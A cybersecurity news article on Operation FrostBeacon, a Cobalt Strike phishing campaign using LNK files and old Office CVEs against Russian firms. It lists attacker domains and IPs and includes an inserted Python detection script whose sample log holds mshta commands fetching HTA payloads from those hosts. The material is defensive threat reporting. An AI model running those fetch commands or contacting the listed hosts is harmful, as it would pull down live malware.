
Cobalt Strike Malware Strikes Finance and Legal Departments in Operation FrostBeacon

Seqrite Labs has uncovered a sophisticated cybercrime campaign, dubbed Operation FrostBeacon, targeting organizations in the Russian Federation.

The campaign primarily focuses on finance and legal departments in B2B enterprises across the logistics, industrial production, and construction sectors. Researchers describe the campaign as financially motivated, using Cobalt Strike beacons for remote access and control of infected systems.

Two Infection Clusters: LNK and CVE Exploitation Chains

Operation FrostBeacon operates through two distinct infection clusters that eventually deliver the same Cobalt Strike payload.

The first, known as the LNK cluster, begins with phishing emails carrying malicious archives such as рекламация.zip or договор.rar.

These attachments contain a decoy Excel or Word document and a malicious LNK file, disguised with double extensions to appear harmless.

When opened, the shortcut file launches a hidden PowerShell command that triggers mshta.exe to fetch a remote file, such as dosing.hta, from domains such as valisi[.]ru or ezstat[.]ru.

The HTA file reconstructs and executes an obfuscated PowerShell loader that decodes several Base64- and XOR‑encoded blocks before injecting Cobalt Strike shellcode directly into system memory.

This in‑memory execution, combined with dynamic API resolution and reflective loading, helps evade antivirus and EDR controls.

The beacon configuration connects over HTTPS to update.ecols[.]ru using a Cobalt Strike malleable profile imitating jQuery web traffic.

The second cluster employs legacy Microsoft Office vulnerabilities CVE‑2017‑0199 and CVE‑2017‑11882 to deliver the same malware. Victims receive phishing documents such as рекламация.docx referencing remote templates hosted at aquacomplect[.]ru.


These templates silently execute HTA payloads, often chaining both CVEs to achieve remote code execution without macros. Despite being patched years ago, these exploits remain highly effective against unpatched systems.

Russian Infrastructure and Criminal Motive

Seqrite’s infrastructure analysis linked the campaign to over 40 Russian‑registered domains, all hosted through local registrars such as RU‑CENTER and REGRU.

Notable command‑and‑control domains include forensics.jwork[.]ru, moscable77[.]ru, bsprofi[.]ru, and iplis[.]ru. The beacon configuration also lists proxy IPs like 45.147.14.106 and 45.145.91.164, both associated with JSC Selectel (Russia).
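As an added example (not code from Seqrite's report or from this article), the following Python sketch turns the behaviours described above into detection rules: the LNK cluster's PowerShell-to-mshta.exe hop with a remote HTA URL, the CVE cluster's Office-to-mshta.exe and Equation Editor child-process patterns, and a match against the command-and-control domains and proxy IPs listed in the write-up. The JSON event format, its field names and the sample events are assumptions constructed for the example; only the domains and IP addresses come from the article.

```python
"""Detection sketch for the Operation FrostBeacon execution chains.

Hypothetical log format (constructed for this example, not Seqrite's telemetry):
one JSON object per line with fields "parent", "image", "cmdline" and "dst"
(destination host of any network connection made by the process).
"""
import json
import re

# Indicators quoted in the article, kept defanged with "[.]" as published.
FROSTBEACON_DOMAINS = {
    "valisi[.]ru", "ezstat[.]ru", "update.ecols[.]ru", "aquacomplect[.]ru",
    "forensics.jwork[.]ru", "moscable77[.]ru", "bsprofi[.]ru", "iplis[.]ru",
}
FROSTBEACON_IPS = {"45.147.14.106", "45.145.91.164"}

OFFICE_PROCESSES = {"winword.exe", "excel.exe"}
URL_HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)


def refang(indicator):
    """Turn the published "[.]" form back into a matchable hostname."""
    return indicator.replace("[.]", ".")


KNOWN_HOSTS = {refang(d) for d in FROSTBEACON_DOMAINS} | FROSTBEACON_IPS


def hosts_in(text):
    """Extract lower-cased hostnames from any http(s) URLs in a command line."""
    return {m.group(1).lower() for m in URL_HOST_RE.finditer(text)}


def analyze_event(event):
    """Return the names of every rule that fires on one process-creation event."""
    hits = []
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")
    dst = event.get("dst", "").lower()
    remote_hosts = hosts_in(cmdline)

    # Rule 1 (LNK cluster): PowerShell launching mshta.exe against a remote URL.
    if parent == "powershell.exe" and image == "mshta.exe" and remote_hosts:
        hits.append("lnk_cluster_mshta_remote_hta")
    # Rule 2 (CVE-2017-0199 pattern): an Office application spawning mshta.exe.
    if parent in OFFICE_PROCESSES and image == "mshta.exe":
        hits.append("office_spawns_mshta")
    # Rule 3 (CVE-2017-11882 pattern): Equation Editor spawning any child at all.
    if parent == "eqnedt32.exe":
        hits.append("equation_editor_child_process")
    # Rule 4: known FrostBeacon infrastructure in the command line or destination.
    if (remote_hosts & KNOWN_HOSTS) or dst in KNOWN_HOSTS:
        hits.append("frostbeacon_ioc_match")
    return hits


def scan_log(lines):
    """Run every rule over a list of JSON event lines; return (line_no, image, hits)."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        hits = analyze_event(event)
        if hits:
            findings.append((line_no, event.get("image", ""), hits))
    return findings


# Constructed sample events (hypothetical; not real telemetry from the campaign).
SAMPLE_LOG = [
    '{"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe -WindowStyle Hidden", "dst": ""}',
    '{"parent": "powershell.exe", "image": "mshta.exe", "cmdline": "mshta.exe http://valisi.ru/dosing.hta", "dst": "valisi.ru"}',
    '{"parent": "winword.exe", "image": "mshta.exe", "cmdline": "mshta.exe http://aquacomplect.ru/template.hta", "dst": "aquacomplect.ru"}',
    '{"parent": "eqnedt32.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c echo constructed", "dst": ""}',
    '{"parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe https://example.com/", "dst": "example.com"}',
    '{"parent": "mshta.exe", "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile", "dst": "update.ecols.ru"}',
]


def run_sample():
    """Convenience wrapper so the sample scan can be called and checked by name."""
    return scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for line_no, image, hits in run_sample():
        print(f"line {line_no}: {image} -> {', '.join(hits)}")
```

Rules 1 to 3 are behavioural and keep firing when the actors rotate domains; rule 4 is the cheap IoC sweep for historical telemetry. In production the parent/child match would come from Sysmon event ID 1 or an EDR's process-creation stream rather than the constructed JSON used here.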


Seqrite attributes the campaign to a Russian‑speaking, financially motivated group, noting similarities in tactics with those used by the Cobalt Group, a threat actor known for targeting financial institutions worldwide.

This campaign demonstrates that even in 2025, legacy Office vulnerabilities and Cobalt Strike abuse remain key tools for cybercriminals; in Operation FrostBeacon they are weaponized against domestic finance and legal teams.


The post Cobalt Strike Malware Strikes Finance and Legal Departments in Operation FrostBeacon appeared first on Cyber Security News.

